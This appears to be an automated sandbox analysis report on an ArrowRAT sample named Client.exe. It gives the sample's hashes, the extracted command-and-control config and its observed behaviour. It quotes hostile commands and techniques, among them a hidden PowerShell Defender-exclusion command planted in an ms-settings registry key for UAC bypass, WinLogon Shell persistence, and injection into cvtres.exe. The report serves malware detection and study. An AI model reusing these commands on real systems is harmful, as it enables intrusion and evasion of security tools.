Analysis
-
max time kernel
128s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18-11-2024 13:25
Behavioral task
behavioral1
Sample
Client.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Client.exe
Resource
win10v2004-20241007-en
General
-
Target
Client.exe
-
Size
158KB
-
MD5
16a66efc62e16195848483277f81cb3b
-
SHA1
5b3b70e9df9b025576386abfa9ed7c342e8d7a46
-
SHA256
e694001c6e68ee030e201b680d2e1916ee121fe76f050121045a3fa2465e3ed6
-
SHA512
87d682acb2b44506711e4758762e16c3f29101c5a20c1b144ff2c337c37a82f8bd0bbf13c65bb1e5e2423bcf3f042cd9d114256846aeb5c8e66119b64d6d1393
-
SSDEEP
3072:gbzxH+0OoCthfbEFtbcfjF45gjryKKqH6JY2doszEmQotEPPcfPMiO8Y:gbzxe0ODhTEPgnjuIJzo+PPcfPMd8
Malware Config
Extracted
arrowrat
Pf030dc1ckld12od3
192.168.1.46:1337
QplfyCtwT
Signatures
-
Arrowrat family
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Local\\Pan\\dora" Client.exe -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\ms-settings\shell\open Client.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\ms-settings\shell Client.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\ms-settings Client.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\ms-settings\shell\open\command\ = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\\Users\\Admin\\AppData\\Local\\Pan\\dora'" Client.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\ms-settings\shell\open\command\DelegateExecute Client.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000_CLASSES\ms-settings\shell\open\command Client.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 2148 Client.exe 2148 Client.exe 2148 Client.exe 2148 Client.exe 2148 Client.exe 2148 Client.exe 2148 Client.exe 2148 Client.exe 2148 Client.exe 2148 Client.exe 2148 Client.exe 2148 Client.exe 2148 Client.exe 2148 Client.exe 2148 Client.exe 2148 Client.exe 2148 Client.exe 2148 Client.exe 2148 Client.exe 2148 Client.exe 2148 Client.exe 2148 Client.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2148 Client.exe Token: SeShutdownPrivilege 2016 explorer.exe Token: SeShutdownPrivilege 2016 explorer.exe Token: SeShutdownPrivilege 2016 explorer.exe Token: SeShutdownPrivilege 2016 explorer.exe Token: SeShutdownPrivilege 2016 explorer.exe Token: SeShutdownPrivilege 2016 explorer.exe Token: SeShutdownPrivilege 2016 explorer.exe Token: SeShutdownPrivilege 2016 explorer.exe Token: SeShutdownPrivilege 2016 explorer.exe Token: SeShutdownPrivilege 2016 explorer.exe Token: SeShutdownPrivilege 2016 explorer.exe Token: SeShutdownPrivilege 2016 explorer.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe -
Suspicious use of SendNotifyMessage 17 IoCs
pid Process 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe 2016 explorer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2148 Client.exe -
Suspicious use of WriteProcessMemory 49 IoCs
description pid Process procid_target PID 2148 wrote to memory of 2016 2148 Client.exe 30 PID 2148 wrote to memory of 2016 2148 Client.exe 30 PID 2148 wrote to memory of 2016 2148 Client.exe 30 PID 2148 wrote to memory of 2076 2148 Client.exe 31 PID 2148 wrote to memory of 2076 2148 Client.exe 31 PID 2148 wrote to memory of 2076 2148 Client.exe 31 PID 2148 wrote to memory of 2076 2148 Client.exe 31 PID 2148 wrote to memory of 2524 2148 Client.exe 32 PID 2148 wrote to memory of 2524 2148 Client.exe 32 PID 2148 wrote to memory of 2524 2148 Client.exe 32 PID 2148 wrote to memory of 2524 2148 Client.exe 32 PID 2148 wrote to memory of 2400 2148 Client.exe 33 PID 2148 wrote to memory of 2400 2148 Client.exe 33 PID 2148 wrote to memory of 2400 2148 Client.exe 33 PID 2148 wrote to memory of 2400 2148 Client.exe 33 PID 2148 wrote to memory of 2336 2148 Client.exe 34 PID 2148 wrote to memory of 2336 2148 Client.exe 34 PID 2148 wrote to memory of 2336 2148 Client.exe 34 PID 2148 wrote to memory of 2336 2148 Client.exe 34 PID 2148 wrote to memory of 2540 2148 Client.exe 35 PID 2148 wrote to memory of 2540 2148 Client.exe 35 PID 2148 wrote to memory of 2540 2148 Client.exe 35 PID 2148 wrote to memory of 2540 2148 Client.exe 35 PID 2148 wrote to memory of 2544 2148 Client.exe 36 PID 2148 wrote to memory of 2544 2148 Client.exe 36 PID 2148 wrote to memory of 2544 2148 Client.exe 36 PID 2148 wrote to memory of 2544 2148 Client.exe 36 PID 2148 wrote to memory of 2096 2148 Client.exe 37 PID 2148 wrote to memory of 2096 2148 Client.exe 37 PID 2148 wrote to memory of 2096 2148 Client.exe 37 PID 2148 wrote to memory of 2096 2148 Client.exe 37 PID 2148 wrote to memory of 2100 2148 Client.exe 38 PID 2148 wrote to memory of 2100 2148 Client.exe 38 PID 2148 wrote to memory of 2100 2148 Client.exe 38 PID 2148 wrote to memory of 2100 2148 Client.exe 38 PID 2148 wrote to memory of 2676 2148 Client.exe 39 PID 2148 wrote to memory of 2676 2148 Client.exe 39 PID 2148 wrote to memory of 2676 2148 Client.exe 39 PID 2148 wrote to memory of 2676 2148 Client.exe 39 PID 2148 wrote to memory of 2272 2148 Client.exe 40 PID 2148 wrote to memory of 2272 2148 Client.exe 40 PID 2148 wrote to memory of 2272 2148 Client.exe 40 PID 2148 wrote to memory of 2272 2148 Client.exe 40 PID 2016 wrote to memory of 2288 2016 explorer.exe 41 PID 2016 wrote to memory of 2288 2016 explorer.exe 41 PID 2016 wrote to memory of 2288 2016 explorer.exe 41 PID 2148 wrote to memory of 636 2148 Client.exe 42 PID 2148 wrote to memory of 636 2148 Client.exe 42 PID 2148 wrote to memory of 636 2148 Client.exe 42 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Client.exe"C:\Users\Admin\AppData\Local\Temp\Client.exe"1⤵
- Modifies WinLogon for persistence
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Boot or Logon Autostart Execution: Active Setup
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\system32\ctfmon.exectfmon.exe3⤵PID:2288
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Pf030dc1ckld12od3 192.168.1.46 1337 QplfyCtwT2⤵PID:2076
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Pf030dc1ckld12od3 192.168.1.46 1337 QplfyCtwT2⤵PID:2524
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Pf030dc1ckld12od3 192.168.1.46 1337 QplfyCtwT2⤵PID:2400
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Pf030dc1ckld12od3 192.168.1.46 1337 QplfyCtwT2⤵PID:2336
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Pf030dc1ckld12od3 192.168.1.46 1337 QplfyCtwT2⤵PID:2540
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Pf030dc1ckld12od3 192.168.1.46 1337 QplfyCtwT2⤵PID:2544
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Pf030dc1ckld12od3 192.168.1.46 1337 QplfyCtwT2⤵PID:2096
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Pf030dc1ckld12od3 192.168.1.46 1337 QplfyCtwT2⤵PID:2100
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Pf030dc1ckld12od3 192.168.1.46 1337 QplfyCtwT2⤵PID:2676
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Pf030dc1ckld12od3 192.168.1.46 1337 QplfyCtwT2⤵PID:2272
-
-
C:\Windows\System32\ComputerDefaults.exe"C:\Windows\System32\ComputerDefaults.exe"2⤵PID:636
-